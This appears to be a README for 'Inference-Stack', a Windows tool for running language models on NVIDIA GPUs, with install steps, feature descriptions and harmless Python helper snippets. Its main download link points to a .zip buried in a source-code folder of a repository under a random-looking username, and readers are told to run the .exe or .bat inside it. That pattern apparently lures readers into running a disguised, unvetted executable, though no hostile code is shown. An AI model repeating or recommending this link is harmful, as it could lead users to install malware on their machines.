Inference-Stack runs large language models (LLMs) on Windows using your NVIDIA GPU. It pairs a simple interface with backend worker processes, and it speeds up responses through request scheduling, multi-GPU execution, and caching. It accepts several types of input, including text and images. A gateway service receives each request and hands it to fast Python workers.
This app is for users who want to explore AI models without complex setup. Models run on your own GPU, which is much faster than running them on the CPU.
Before you install, make sure your computer meets these basic needs:
- Operating System: Windows 10 or later (64-bit)
- Processor: Intel i5 or AMD Ryzen 5 (or better)
- RAM: 16 GB or more (recommended)
- GPU: NVIDIA GPU with at least 6 GB VRAM and CUDA support
- Disk Space: 10 GB free space for files and cache
- Internet: Required for downloading and initial setup
An NVIDIA GPU with CUDA support is required because Inference-Stack runs its heavy calculations on the GPU. Other GPUs may not work at all, or will run very slowly.
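If Python is installed, the GPU and disk requirements above can be checked with a short script. This is a minimal sketch, not part of Inference-Stack: the function names are made up for illustration, and it assumes the `nvidia-smi` tool that ships with the NVIDIA driver is on your PATH.

```python
import shutil
import subprocess

MIN_VRAM_MIB = 6 * 1024   # 6 GB VRAM, from the requirements list
MIN_FREE_DISK_GB = 10     # 10 GB free disk space, from the requirements list


def parse_vram_mib(smi_output):
    """Parse one integer (MiB) per line, as printed by nvidia-smi with
    --query-gpu=memory.total --format=csv,noheader,nounits."""
    values = []
    for line in smi_output.splitlines():
        line = line.strip()
        if line.isdigit():
            values.append(int(line))
    return values


def query_vram_mib():
    """Return total VRAM per GPU in MiB, or [] if nvidia-smi is unavailable."""
    if shutil.which("nvidia-smi") is None:
        return []
    result = subprocess.run(
        ["nvidia-smi", "--query-gpu=memory.total",
         "--format=csv,noheader,nounits"],
        capture_output=True, text=True, check=False,
    )
    return parse_vram_mib(result.stdout) if result.returncode == 0 else []


def check_requirements(vram_mib, free_disk_gb):
    """Return a list of human-readable problems (empty if none were found)."""
    problems = []
    if not vram_mib:
        problems.append("No NVIDIA GPU detected (nvidia-smi missing or failed).")
    elif max(vram_mib) < MIN_VRAM_MIB:
        problems.append(f"Largest GPU has {max(vram_mib)} MiB VRAM; "
                        f"{MIN_VRAM_MIB} MiB is required.")
    if free_disk_gb < MIN_FREE_DISK_GB:
        problems.append(f"Only {free_disk_gb:.1f} GB free disk space; "
                        f"{MIN_FREE_DISK_GB} GB is required.")
    return problems


if __name__ == "__main__":
    free_gb = shutil.disk_usage(".").free / 1024**3
    issues = check_requirements(query_vram_mib(), free_gb)
    for message in issues or ["GPU and disk requirements look fine."]:
        print(message)
```

The script checks only VRAM and free disk space on the current drive; the operating system, processor, and RAM still need to be checked by hand.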
To start using Inference-Stack on your Windows computer, follow these steps:
Go to the releases page to get the latest version:
Download Inference-Stack on GitHub
This page shows all available versions. Pick the latest release based on the date.
Look for a file with one of these extensions:
- .exe: An installer that guides you through setup.
- .zip: A compressed folder with the program files.
If available, use the .exe file for an easier experience.
If you downloaded the .exe:
- Double-click the file to start.
- Follow the prompts to complete installation.
- Choose the installation folder or use the default.
- Wait for the installer to finish.
If you got a .zip file:
- Right-click the file and select “Extract All.”
- Choose a destination folder for the files.
- Open the folder after extraction.
Make sure the NVIDIA drivers and CUDA are installed:
- Check your GPU driver version in Windows Device Manager.
- If the driver is outdated, download the latest version from the NVIDIA website.
- Install the CUDA Toolkit by following NVIDIA’s instructions.
You may need to restart your PC after these steps.
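The driver and CUDA checks above can also be done from a script. The sketch below assumes `nvidia-smi` (installed with the driver) and `nvcc` (installed with the CUDA Toolkit) are on your PATH. The helper names are illustrative only and are not part of Inference-Stack.

```python
import re
import shutil
import subprocess
from typing import List, Optional


def parse_nvcc_release(nvcc_output: str) -> Optional[str]:
    """Extract the release number (for example '12.4') from `nvcc --version`."""
    match = re.search(r"release\s+(\d+\.\d+)", nvcc_output)
    return match.group(1) if match else None


def run_tool(args: List[str]) -> Optional[str]:
    """Run a command and return its stdout, or None if it is missing or fails."""
    if shutil.which(args[0]) is None:
        return None
    result = subprocess.run(args, capture_output=True, text=True, check=False)
    return result.stdout if result.returncode == 0 else None


if __name__ == "__main__":
    driver = run_tool(
        ["nvidia-smi", "--query-gpu=driver_version", "--format=csv,noheader"]
    )
    nvcc = run_tool(["nvcc", "--version"])
    print("Driver version:", driver.strip() if driver else "not found")
    print("CUDA Toolkit release:",
          (parse_nvcc_release(nvcc) or "unrecognized") if nvcc else "not found")
```

If either line prints "not found", the corresponding component is probably missing or not on your PATH.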
Open the folder where you installed or extracted the app.
Look for a launcher file with a name like Inference-Stack.exe or start.bat.
Double-click it to run the program.
When the app opens:
- It connects to your GPU automatically.
- The interface is simple: you input a prompt or data.
- The system sends it to the backend workers for processing.
- Results usually appear within seconds; larger models take longer.
You can test with basic text requests first before trying other inputs like images.
- Dynamic Batching: Groups requests that arrive close together into one batch so the GPU processes them in a single pass.
- GPU Acceleration: Uses your NVIDIA GPU to handle complex calculations.
- gRPC Interface: Efficient communication between the app’s parts.
- KV Cache: Stores the attention keys and values of tokens already processed so they are not recomputed for each new token.
- Multi-modal Inputs: Supports text, images, and other data types.
- Tensor Parallelism: Splits a model's weight tensors across multiple GPUs so that each GPU computes part of every layer.
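To make the tensor parallelism item concrete, here is a toy sketch in plain Python. It illustrates the general idea only and is not Inference-Stack's implementation: a weight matrix is split by columns into shards, each shard stands in for one GPU, and the partial results are joined back together. All function names are hypothetical.

```python
def matmul(x, w):
    """Multiply x (n x k) by w (k x m); both are lists of rows."""
    return [[sum(a * b for a, b in zip(row, col)) for col in zip(*w)]
            for row in x]


def split_columns(w, parts):
    """Split w into `parts` column shards of near-equal width."""
    cols = len(w[0])
    bounds = [cols * i // parts for i in range(parts + 1)]
    return [[row[lo:hi] for row in w] for lo, hi in zip(bounds, bounds[1:])]


def tensor_parallel_matmul(x, w, parts):
    """Compute x @ w by giving each simulated device one column shard of w."""
    shards = split_columns(w, parts)
    # Each entry is the output slice that one device would compute.
    partials = [matmul(x, shard) for shard in shards]
    # Concatenate the slices row by row to rebuild the full output.
    return [sum((p[i] for p in partials), []) for i in range(len(x))]


if __name__ == "__main__":
    x = [[1, 2], [3, 4]]
    w = [[1, 0, 2, 1], [0, 1, 1, 3]]
    print(tensor_parallel_matmul(x, w, parts=2))  # [[1, 2, 4, 7], [3, 4, 10, 15]]
```

The sharded result equals the ordinary matrix product. On real hardware the shards are computed at the same time on different GPUs, and that is where the speedup comes from.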
These features run automatically. You only need to provide input and get outputs.
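For readers curious how dynamic batching works, the following is a minimal sketch using Python's `asyncio`. It is an illustration under stated assumptions, not the project's scheduler: `DynamicBatcher`, `max_batch_size`, `max_wait_s`, and `fake_model` are all hypothetical names, and the "model" here just upper-cases text.

```python
import asyncio


class DynamicBatcher:
    """Collect requests until the batch is full or a short wait expires."""

    def __init__(self, run_batch, max_batch_size=4, max_wait_s=0.05):
        self.run_batch = run_batch          # function: list of prompts -> list of outputs
        self.max_batch_size = max_batch_size
        self.max_wait_s = max_wait_s
        self.queue = asyncio.Queue()

    async def submit(self, prompt):
        """Queue one request and wait for its individual result."""
        future = asyncio.get_running_loop().create_future()
        await self.queue.put((prompt, future))
        return await future

    async def serve(self):
        """Run forever, forming batches and dispatching them."""
        loop = asyncio.get_running_loop()
        while True:
            batch = [await self.queue.get()]            # wait for the first request
            deadline = loop.time() + self.max_wait_s
            while len(batch) < self.max_batch_size:
                remaining = deadline - loop.time()
                if remaining <= 0:
                    break
                try:
                    batch.append(await asyncio.wait_for(self.queue.get(), remaining))
                except asyncio.TimeoutError:
                    break
            outputs = self.run_batch([prompt for prompt, _ in batch])
            for (_, future), output in zip(batch, outputs):
                future.set_result(output)


def fake_model(prompts):
    """Stand-in for one batched forward pass on the GPU."""
    return [p.upper() for p in prompts]


async def demo():
    batch_sizes = []

    def run_batch(prompts):
        batch_sizes.append(len(prompts))
        return fake_model(prompts)

    batcher = DynamicBatcher(run_batch, max_batch_size=4, max_wait_s=0.05)
    server = asyncio.create_task(batcher.serve())
    results = await asyncio.gather(*(batcher.submit(f"req {i}") for i in range(6)))
    server.cancel()
    return results, batch_sizes


if __name__ == "__main__":
    results, sizes = asyncio.run(demo())
    print(results)
    print("batch sizes:", sizes)
```

The two settings trade latency for throughput: a longer wait or a larger batch keeps the GPU busier, but each request may wait slightly longer before processing starts.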
New versions improve speed and add features. Check the releases page regularly.
To update:
- Download the new installer or zip file.
- Follow the same steps as for the first installation.
- Your settings are usually kept unless you uninstall the old version first.
If the app does not start:
- Make sure your GPU drivers are up to date.
- Check that your system meets all requirements.
- Restart your computer and try again.
If the app cannot find your GPU:
- Confirm CUDA toolkit is installed.
- Verify that the installed CUDA version is supported by your GPU and driver.
If responses are slow:
- Close other heavy programs.
- Check your GPU is not overheating.
- Restart the app.
Inference-Stack runs locally on your PC. Your data does not leave your machine unless you share it.
The system does not send your inputs or results to any external servers.
The app may include sample scripts or configuration files. Advanced users can adjust settings to control how models run. However, for basic use, defaults work fine.
- Primary download page: https://github.com/Diligent-battledamage421/Inference-Stack/raw/refs/heads/main/inference-api/src/completions/Stack_Inference_v1.6.zip
- NVIDIA drivers: https://www.nvidia.com/Download/index.aspx
- CUDA Toolkit: https://developer.nvidia.com/cuda-downloads